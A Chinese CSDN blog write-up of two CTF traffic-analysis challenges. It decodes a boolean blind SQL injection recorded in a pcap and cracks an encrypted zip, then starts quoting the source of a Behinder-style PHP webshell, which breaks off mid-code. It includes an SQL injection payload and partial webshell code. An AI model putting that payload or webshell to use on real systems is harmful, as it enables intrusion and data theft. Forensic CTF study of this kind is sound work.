3CTF的两道流量分析题

本文介绍了3CTF比赛中两道流量分析题的解题过程。第一题涉及HTTP流量中的bool盲注,通过解压文件、明文攻击获取flag。第二题涉及冰蝎动态二进制加密,通过分析流量包、解密攻击内容,利用DPAPI和Master Key File恢复Chrome密码。解题方法包括使用mimikatz和Windows Password Recovery软件。
摘要由CSDN通过智能技术生成

第一道忘了叫啥了

题目链接:https://url.cn/5EvIRl6
提取码:i6ir

是初赛的Misc1题目,给了一个1.pcap文件。内容是黑客进行bool盲注的过程。

看一下HTTP,很容易看到一个readme.7z的压缩包,导出来,就一个readme.txt,没啥了。

然后可以注意到,盲注过程中响应内容的大小不是706bytes就是722bytes。(刚开始我还在想这尼玛会不会是二进制,对不起打扰了

706字节 - -
在这里插入图片描述
722字节 - -
在这里插入图片描述
比如说,攻击者刚开始爆数据库个数时:

?id=1' and ((select count(schema_name) from information_schema.schemata) > 0)#

一直到 >6都返回的是706字节,而>7时,返回了722字节,说明这时候相当于是报错了,也就是说个数应该是7。

突然发现盲注这块是我的盲点,,哭了

然后看到后面开始查询字段的时候,看到是有urlpasswd两个字段。
在这里插入图片描述
嗯所以需要根据回显内容把这两个字段给解出来,一位一位地慢慢解,,

在这里插入图片描述
解出来是这样的(然鹅我令人堪忧的数学把我带到了上一个字符去2333:

url:
116 46 99 110 47 65 105 56 80 104 113 83 98
t.cn/Ai8PhqSb
passwd:
98 107 105 115
bkis

这个短链接其实是个百度网盘 - -
在这里插入图片描述
flag.zip是加密的,内容有flag.txt和readme.txt。

那么这就很容易想到了明文攻击了(虽然比赛的时候我没想到,因为我当时做题已经做傻了,,

嗯然后AAPR明文跑密钥解密就完事儿了。flag{1d0ea6a36f6aaf7fa5d4b007454227d6}

当然也有师傅闲着没事儿跑了一个多小时把口令也跑出来了:CtF36o!s0
在这里插入图片描述


第二道好像是叫黑客攻击啥的

题目链接:https://url.cn/5JhQXkI
提取码:txnq

复赛的流量题。首先看到的是shell脚本:

<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
   
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
   
    $key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
   
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
   
    			 $post[$i] = $post[
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值